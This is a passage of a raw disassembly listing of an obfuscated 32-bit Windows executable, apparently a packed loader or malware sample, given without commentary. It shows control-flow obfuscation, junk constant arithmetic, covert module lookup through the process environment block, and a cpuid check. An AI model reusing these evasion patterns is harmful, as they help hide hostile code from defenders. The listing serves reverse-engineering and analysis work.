loc_4256AC: ; CODE XREF: sub_4294B3+BC�j
jmp loc_422517
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
db 0D9h, 0B8h, 13h
db 0CCh ; DATA XREF: sub_4272E9+5071�o
db 0A4h, 0DCh, 0BCh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B3C
loc_4256B8: ; CODE XREF: sub_426B3C+5�j
jmp nullsub_39
; END OF FUNCTION CHUNK FOR sub_426B3C
; ---------------------------------------------------------------------------
db 0FFh, 5Eh, 22h
dword_4256C0 dd 9C77DD6h ; DATA XREF: sub_426602+4�w
; sub_422FBC+5E23�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4256C4: ; CODE XREF: sub_4294B3+1A�j
jmp loc_4296B1
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
retn 5F96h
; ---------------------------------------------------------------------------
dword_4256CC dd 77DD0000h ; DATA XREF: sub_422538+6�r
; sub_427004+3�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_4256D0: ; CODE XREF: sub_423614+8F01�j
jmp loc_42AE88
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
lahf
xchg eax, ebp
loc_4256D7: ; DATA XREF: sub_429382:loc_423D9D�o
; sub_427004+13�o
and dl, [esi]
xor bl, cl
retn 4B0Eh
; ---------------------------------------------------------------------------
dw 2366h
dd 0C6C68CC5h
db 0
; ---------------------------------------------------------------------------
loc_4256E5: ; CODE XREF: _94j21ax3:00421521�j
jmp locret_424DD0
; ---------------------------------------------------------------------------
dw 0BE00h
dd 0E3BEF3D6h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428381
loc_4256F0: ; CODE XREF: sub_428381-3068�j
jmp loc_42A249
; END OF FUNCTION CHUNK FOR sub_428381
; ---------------------------------------------------------------------------
loc_4256F5: ; CODE XREF: _94j21ax3:00428E8B�j
rol ebx, 4
; START OF FUNCTION CHUNK FOR sub_428F65
loc_4256F8: ; CODE XREF: sub_428F65:loc_428E78�j
call sub_421ABD
loc_4256FD: ; CODE XREF: _94j21ax3:00424CD7�j
jmp loc_421210
; END OF FUNCTION CHUNK FOR sub_428F65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_425702: ; CODE XREF: sub_42284F+A�j
add [esi], eax
call sub_424CF2
loc_425709: ; DATA XREF: sub_42983E-A0A�o
add esp, 4
mov eax, 51h
push edx
push 77BC1D75h
pop edx
call sub_4255BF
loc_42571D: ; DATA XREF: sub_4213A8:loc_424A64�o
js loc_4245EB
push ecx
mov [esp+0], eax
push 21F9891Eh
pop eax
rol eax, 0Eh
test eax, 10000000h
jmp loc_4227A2
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_42573B: ; CODE XREF: sub_421047:loc_42202F�j
inc dword ptr [ebp-0Ch]
jmp loc_427E88
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
loc_425743: ; CODE XREF: _94j21ax3:00427E78�j
; _94j21ax3:loc_42BD74�j
inc dword ptr [ebp-8]
inc dword ptr [ebp-0Ch]
jmp loc_427979
; =============== S U B R O U T I N E =======================================
sub_42574E proc near ; CODE XREF: sub_421013+4�p
; sub_42BB39:loc_421058�p ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00427BCC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042BAA7 SIZE 00000005 BYTES
call sub_42BB39
loc_425753: ; CODE XREF: sub_428A7E+6�j
jmp loc_427BCC
sub_42574E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425758 proc near ; DATA XREF: _94j21ax3:0042393C�o
arg_0 = dword ptr 4
pop eax
mov ebx, offset sub_4279A0
xchg ebx, [esp-4+arg_0]
retn
sub_425758 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BDF4
loc_425762: ; CODE XREF: sub_42BDF4+C�j
push offset loc_427B8B
jmp loc_424F82
; END OF FUNCTION CHUNK FOR sub_42BDF4
; ---------------------------------------------------------------------------
loc_42576C: ; CODE XREF: _94j21ax3:loc_427AB8�j
mov byte ptr [ebp-802h], 0
mov byte ptr [ebp-801h], 1
push offset sub_424D8C
jmp locret_42BD2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_425784: ; CODE XREF: sub_42284F+835D�j
jz loc_42A566
jmp loc_42BAB7
; END OF FUNCTION CHUNK FOR sub_42284F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_170. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_425790 proc near ; CODE XREF: _94j21ax3:00424213�j
; sub_42A51B+1�p
; FUNCTION CHUNK AT 004215B3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004225F9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00422C60 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422C6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E82 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0042406C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427FE3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429C39 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042C006 SIZE 00000025 BYTES
xchg edx, [esp+0]
pop edx
push 0B1300306h
pop eax
xor eax, 0D66FDC43h
add eax, 98E26123h
jmp loc_4215B3
sub_425790 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_4257AC: ; CODE XREF: sub_421689+FC5�j
jmp loc_4232EA
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_4257B2: ; CODE XREF: sub_421402+12E2�j
jmp loc_421216
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4257B7: ; CODE XREF: sub_423324-19DE�j
jmp loc_4220E5
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_4257BC proc near ; CODE XREF: _94j21ax3:00428637�j
; sub_4258EB+5982�p
; FUNCTION CHUNK AT 00423A2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428593 SIZE 0000000A BYTES
mov [esp+0], esi
pop esi
add edx, ebp
add edx, 1CD3FD1h
mov [edx], eax
pop edx
jmp loc_423A2E
sub_4257BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add esi, 3132CF92h
jmp sub_422764
; ---------------------------------------------------------------------------
popf
jmp sub_423505
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4257E2: ; CODE XREF: _94j21ax3:loc_428B2E�j
jz loc_427AD4
jmp loc_427711
; ---------------------------------------------------------------------------
locret_4257ED: ; CODE XREF: _94j21ax3:0042BBF4�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42922A
loc_4257EE: ; CODE XREF: sub_42922A-AF0�j
jmp nullsub_67
; END OF FUNCTION CHUNK FOR sub_42922A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42283B
loc_4257F3: ; CODE XREF: sub_42283B:loc_42284A�j
pop eax
xor eax, 0A81E13D1h
add eax, 4C62A163h
xchg eax, [esp+8+var_8]
jmp sub_428A7E
; END OF FUNCTION CHUNK FOR sub_42283B
; =============== S U B R O U T I N E =======================================
sub_425808 proc near ; CODE XREF: _94j21ax3:00428024�j
; sub_42A72D+9�p
; FUNCTION CHUNK AT 00421D20 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422C71 SIZE 00000016 BYTES
xchg eax, [esp+0]
pop eax
mov eax, [ebp-8]
mov al, [eax]
add [ebp-0Ah], al
jmp loc_422C71
sub_425808 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425819 proc near ; DATA XREF: _94j21ax3:00427134�o
var_8 = dword ptr -8
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00422312 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042405C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424575 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425053 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425A5A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004267E9 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00426C14 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427095 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428B33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B8DE SIZE 00000014 BYTES
push edx
push ebx
push ecx
loc_42581C: ; CODE XREF: _94j21ax3:00422F34�j
sub ebx, 0B4A0B93Ah
push eax
pop ebx
sbb ecx, 0AC5D6882h
jmp loc_42405C
sub_425819 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DC
loc_42582F: ; CODE XREF: sub_4237DC:loc_429DC2�j
add [ebp-8], eax
push offset loc_426BE9
jmp loc_42B37F
; END OF FUNCTION CHUNK FOR sub_4237DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42583C: ; CODE XREF: sub_4294B3+14A3�j
jz loc_424F94
jmp loc_42850E
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A56
loc_425847: ; CODE XREF: sub_423A56:loc_4274DB�j
; _94j21ax3:loc_4275D0�j
add edx, 35578D11h
mov [edx], eax
pop edx
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-18h]
jmp loc_428600
; END OF FUNCTION CHUNK FOR sub_423A56
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42585C: ; CODE XREF: _94j21ax3:00426886�j
jmp loc_4237C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_425861: ; CODE XREF: sub_423324+8E�j
jmp loc_424C48
; ---------------------------------------------------------------------------
loc_425866: ; CODE XREF: sub_423324+69�j
xor esi, ecx
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_425868 proc near ; CODE XREF: sub_427344:loc_42554C�p
; FUNCTION CHUNK AT 00423458 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004241CA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424E49 SIZE 00000010 BYTES
mov [esp+0], eax
pop eax
mov ebp, esp
call sub_42A7FC
loc_425873: ; CODE XREF: sub_429F37+1�j
jmp loc_423458
sub_425868 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_425878: ; CODE XREF: sub_42B9CF+8D�j
jnz loc_42183B
jmp loc_4227FD
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
push 0D32DC21Ch
pop eax
add eax, 0EFE0E2CCh
add eax, ebp
jmp loc_42896C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_425896: ; CODE XREF: sub_42C1AE-5B58�j
jns loc_427A6D
not ecx
jmp loc_428A5D
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_4258A3: ; CODE XREF: sub_42C24F:loc_426F78�j
jz loc_42518F
jmp loc_422B01
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422E59
loc_4258AE: ; CODE XREF: sub_422E59+9�j
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_4225DC
jmp loc_428B18
; END OF FUNCTION CHUNK FOR sub_422E59
; ---------------------------------------------------------------------------
loc_4258C0: ; CODE XREF: _94j21ax3:00424455�j
jnz loc_42A21B
jmp loc_4275C1
; =============== S U B R O U T I N E =======================================
sub_4258CB proc near ; CODE XREF: _94j21ax3:00423DC2�j
; sub_421F28+7E10�p
mov [esp+0], ecx
pop ecx
push eax
call sub_423F43
retn
sub_4258CB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4258D6: ; CODE XREF: sub_42284F+4CB5�j
jmp loc_421526
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_4258DB: ; CODE XREF: sub_424C37+6�j
; sub_424C37+4F3F�j
jz loc_42BE43
call sub_428BBD
loc_4258E6: ; CODE XREF: sub_42651A+16�j
jmp loc_424BAF
; END OF FUNCTION CHUNK FOR sub_424C37
; =============== S U B R O U T I N E =======================================
sub_4258EB proc near ; CODE XREF: sub_42A7FC-2029�p
; _94j21ax3:004287DF�j
; FUNCTION CHUNK AT 00422D2F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00423AF2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00424E22 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425BBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004298B4 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004299C0 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042B264 SIZE 00000017 BYTES
xchg edi, [esp+0]
pop edi
xor eax, eax
mov ds:dword_42C488, eax
loc_4258F6: ; CODE XREF: sub_42BFF0:loc_427326�j
; sub_42BFF0-4CB1�j ...
js loc_423AF2
jmp loc_425BBE
sub_4258EB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test edx, edi
jmp loc_424AC6
; ---------------------------------------------------------------------------
loc_425908: ; CODE XREF: _94j21ax3:loc_429113�j
sub eax, 91668F5Dh
add eax, 1C25C677h
xchg eax, [esp]
jmp locret_42211A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42591C: ; CODE XREF: sub_4272E9-211F�j
call sub_42C057
test al, al
jz loc_4292E1
jmp loc_42B9E3
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
loc_42592E: ; CODE XREF: _94j21ax3:004289F7�j
adc ebp, 0A3250523h
; =============== S U B R O U T I N E =======================================
sub_425934 proc near ; CODE XREF: sub_4296C2+A�p
; FUNCTION CHUNK AT 00421BE1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004251C1 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042643C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00426BC9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00427926 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429505 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429EEC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00429F5E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A2E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B144 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042BA45 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042BF71 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042C239 SIZE 0000000B BYTES
mov [esp+0], esi
pop esi
push 6204689Fh
loc_42593D: ; CODE XREF: sub_425934:loc_42BA45�j
pop eax
jmp loc_42BF71
sub_425934 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_425943: ; CODE XREF: sub_4259BF:loc_429308�j
jnz loc_42534C
loc_425949: ; CODE XREF: sub_421D33+5B11�j
jmp loc_427F58
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42594E: ; CODE XREF: sub_423324-3D9�j
jmp nullsub_213
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
sub esi, 0D21A80E5h
cdq
add eax, 307646A9h
jmp loc_425346
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3E4
loc_425965: ; CODE XREF: sub_42B3E4+11C1�j
push offset sub_427D03
jmp nullsub_199
; END OF FUNCTION CHUNK FOR sub_42B3E4
; ---------------------------------------------------------------------------
loc_42596F: ; CODE XREF: _94j21ax3:004286CC�j
jo loc_423A4B
; =============== S U B R O U T I N E =======================================
sub_425975 proc near ; CODE XREF: sub_421047+39B6�p
mov [esp+0], edi
pop edi
call sub_42BFF0
call sub_426A83
sub_425975 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425983 proc near ; CODE XREF: sub_425324+2�p
; _94j21ax3:0042C0E5�j
; FUNCTION CHUNK AT 004239C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004240A5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004247FB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00427BE4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00428AB6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428E7E SIZE 00000005 BYTES
mov [esp+0], ecx
pop ecx
mov eax, large fs:30h
loc_42598E: ; CODE XREF: _94j21ax3:0042AB7F�j
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
loc_425994: ; CODE XREF: _94j21ax3:0042493B�j
; sub_42BC93+C�j
jo loc_427BE4
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
jmp loc_4239C9
sub_425983 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_4259A5: ; CODE XREF: _94j21ax3:004285E1�j
retn
; ---------------------------------------------------------------------------
loc_4259A6: ; DATA XREF: sub_4239A5:loc_421F58�o
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_423F37
call nullsub_11
jmp loc_427E01
; =============== S U B R O U T I N E =======================================
sub_4259BF proc near ; CODE XREF: sub_4239A5+3�j
var_128 = dword ptr -128h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042185A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00421BD9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00421EF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422773 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042468D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042534C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00425943 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004265F4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00427F58 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042866A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428C18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429303 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A985 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042AB10 SIZE 0000001B BYTES
add esp, 0FFFFFED8h
jmp loc_428C18
sub_4259BF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422CA6
loc_4259CA: ; CODE XREF: sub_422CA6:loc_427DED�j
jnz loc_42AD44
jmp loc_429324
; END OF FUNCTION CHUNK FOR sub_422CA6
; ---------------------------------------------------------------------------
loc_4259D5: ; CODE XREF: _94j21ax3:00429240�j
jb loc_42BFC5
sbb ebp, eax
and edi, 0A9F014DAh
; START OF FUNCTION CHUNK FOR sub_4228FF
loc_4259E3: ; CODE XREF: sub_4228FF:loc_424582�j
xor eax, 0BB7FF583h
push edi
pushf
jmp loc_428CD5
; END OF FUNCTION CHUNK FOR sub_4228FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423081
loc_4259F0: ; CODE XREF: sub_423081:loc_42308D�j
jz loc_422AF0
loc_4259F6: ; CODE XREF: sub_42773C+2C7C�j
jmp loc_42A006
; END OF FUNCTION CHUNK FOR sub_423081
; ---------------------------------------------------------------------------
popf
cmp eax, ebx
jmp loc_422AE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_425A03: ; CODE XREF: sub_42AA5F:loc_4215EA�j
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_42AA5F
; =============== S U B R O U T I N E =======================================
sub_425A09 proc near ; CODE XREF: sub_42166E+C�p
; sub_42C0BC-A67C�p ...
; FUNCTION CHUNK AT 00427838 SIZE 00000005 BYTES
jno sub_4236B8
push ebp
mov ebp, esp
jmp loc_427838
sub_425A09 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_425A17: ; CODE XREF: sub_422C48+4883�j
xchg ebp, ebx
mov ebp, esp
call sub_4290B2
loc_425A20: ; CODE XREF: sub_42ADA2+DA9�j
jmp loc_424594
; END OF FUNCTION CHUNK FOR sub_422C48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_425A25: ; CODE XREF: sub_428BBD-1D46�j
jmp loc_42347B
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_425A2A: ; CODE XREF: sub_4221B8+8DC1�j
; _94j21ax3:0042AF95�j
add edi, 9827026Bh
and ebx, edi
pop edi
mov edx, 86B42547h
jmp loc_42BAB1
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A9F
loc_425A3D: ; CODE XREF: sub_426A9F:loc_425133�j
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
jmp loc_42876F
; END OF FUNCTION CHUNK FOR sub_426A9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEDC
loc_425A4A: ; CODE XREF: sub_42BEDC:loc_427B04�j
add edi, ebp
add edi, 75F7D0A5h
mov [edi], eax
pop edi
jmp loc_4286BC
; END OF FUNCTION CHUNK FOR sub_42BEDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_425A5A: ; CODE XREF: sub_425819:loc_427095�j
cmp ebx, eax
push ebx
push 6C893853h
pop ebx
or ebx, ds:4000F8h
xor ebx, 0B377C670h
xor eax, ebx
pop ebx
jmp loc_424575
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA8A
loc_425A77: ; CODE XREF: sub_42BA8A:loc_42704D�j
mov eax, ds:dword_424080
or eax, eax
jnz loc_429D35
jmp loc_4235A3
; END OF FUNCTION CHUNK FOR sub_42BA8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422141
loc_425A8A: ; CODE XREF: sub_422141+7�j
rol ebx, 9
and ebx, 2ACE8FC4h
xor ebx, 0E676B642h
add eax, ebx
pop ebx
push eax
call sub_42A61F
xchg eax, ecx
jmp loc_426F26
; END OF FUNCTION CHUNK FOR sub_422141
; ---------------------------------------------------------------------------
push eax
ror eax, 0Dh
push ebx
push 0C13BFA8Eh
; START OF FUNCTION CHUNK FOR sub_423324
loc_425AB3: ; CODE XREF: sub_423324:loc_4223DB�j
pop ebx
jmp loc_429596
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
pop ecx
xchg ebp, ecx
jmp sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A277
loc_425AC1: ; CODE XREF: sub_42A277-5034�j
ror eax, 6
mov ds:dword_429F80, eax
locret_425ACA: ; CODE XREF: _94j21ax3:00428DD7�j
retn
; END OF FUNCTION CHUNK FOR sub_42A277
; ---------------------------------------------------------------------------
loc_425ACB: ; CODE XREF: _94j21ax3:00421854�j
jmp locret_4242AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A277
loc_425AD0: ; CODE XREF: sub_42284F:loc_424CDC�j
; sub_42A277+6�j
rol eax, 6
xchg eax, edx
push edx
xchg eax, edx
jmp loc_4247DE
; END OF FUNCTION CHUNK FOR sub_42A277
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F9E
loc_425ADD: ; CODE XREF: sub_426F9E:loc_424BBE�j
mov eax, offset dword_426F64
call sub_428AE1
lea eax, [ebp-14h]
; END OF FUNCTION CHUNK FOR sub_426F9E
; START OF FUNCTION CHUNK FOR sub_421656
loc_425AEA: ; CODE XREF: sub_421656+5943�j
push eax
call sub_42BFF0
mov ds:dword_426F74, eax
jmp loc_42ADE3
; END OF FUNCTION CHUNK FOR sub_421656
; ---------------------------------------------------------------------------
loc_425AFA: ; CODE XREF: _94j21ax3:004224D5�j
jz sub_42A4DC
cmp ecx, 661CE117h
jmp loc_42A5B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A83
loc_425B0B: ; CODE XREF: sub_429A83-5B92�j
add dword ptr [esi], 0F80586h
call sub_42C1AE
locret_425B16: ; CODE XREF: sub_42510A+A�j
retn
; END OF FUNCTION CHUNK FOR sub_429A83
; ---------------------------------------------------------------------------
mov edi, 65A1DFEEh
jmp sub_421013
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_201. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421388
loc_425B22: ; CODE XREF: sub_421388+57AF�j
jmp loc_427E22
; END OF FUNCTION CHUNK FOR sub_421388
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAD4
loc_425B27: ; CODE XREF: sub_42BAD4-23B0�j
jge loc_422512
not edi
shl edi, 9
test ecx, ebx
jmp loc_4286AC
; END OF FUNCTION CHUNK FOR sub_42BAD4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_425B39: ; CODE XREF: sub_4272E9+5076�j
call sub_428F65
test al, al
jz loc_421242
jmp loc_4297BA
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
loc_425B4B: ; CODE XREF: _94j21ax3:00422D77�j
or edi, 9915168Eh
rol edi, 15h
loc_425B54: ; CODE XREF: _94j21ax3:loc_426504�j
push 6C173D24h
pop eax
add eax, ds:4000FBh
xor eax, 0C393F6C1h
add eax, ebp
call sub_425448
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_425B6D: ; CODE XREF: sub_42C1AE-373A�j
jmp loc_428BF0
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_425B72: ; CODE XREF: sub_42B238:loc_4227AC�j
; sub_423D25+A�j
jmp sub_424E34
; END OF FUNCTION CHUNK FOR sub_423BF8
; =============== S U B R O U T I N E =======================================
sub_425B77 proc near ; CODE XREF: sub_42ABB1-28A3�p
; _94j21ax3:0042B17F�j
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042248D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042300D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424029 SIZE 00000018 BYTES
xchg edx, [esp+0]
pop edx
popf
xchg eax, [esp+0]
jmp loc_42300D
sub_425B77 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [ebp-4], eax
jmp loc_422243
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ADA2
loc_425B8C: ; CODE XREF: sub_42ADA2:loc_426C46�j
cmp byte ptr [ebp-5], 0
jnz loc_424949
jmp loc_42B9F9
; END OF FUNCTION CHUNK FOR sub_42ADA2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426FE1
loc_425B9B: ; CODE XREF: sub_426FE1+272E�j
mov edx, [ebp-1Ch]
shr edx, 3
mov ecx, ds:dword_429F74
or [ecx+edx], al
mov ecx, [ebp-20h]
jmp loc_42A3BD
; END OF FUNCTION CHUNK FOR sub_426FE1
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_425BB3: ; CODE XREF: _94j21ax3:00427C74�j
jmp loc_42A32E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_425BB9: ; CODE XREF: sub_429862-1E3F�j
jmp nullsub_77
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258EB
loc_425BBE: ; CODE XREF: sub_4258EB+11�j
jmp loc_4298B4
; END OF FUNCTION CHUNK FOR sub_4258EB
; ---------------------------------------------------------------------------
db 0AFh
dword_425BC4 dd 380377E7h ; DATA XREF: sub_422A67+9�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427344
loc_425BC8: ; CODE XREF: sub_427344+1�j
jmp loc_42554C
; END OF FUNCTION CHUNK FOR sub_427344
; ---------------------------------------------------------------------------
align 2
dw 4DBCh
dword_425BD0 dd 77E75CB5h ; DATA XREF: sub_422034+E�w
; sub_426C7A:loc_426C84�r ...
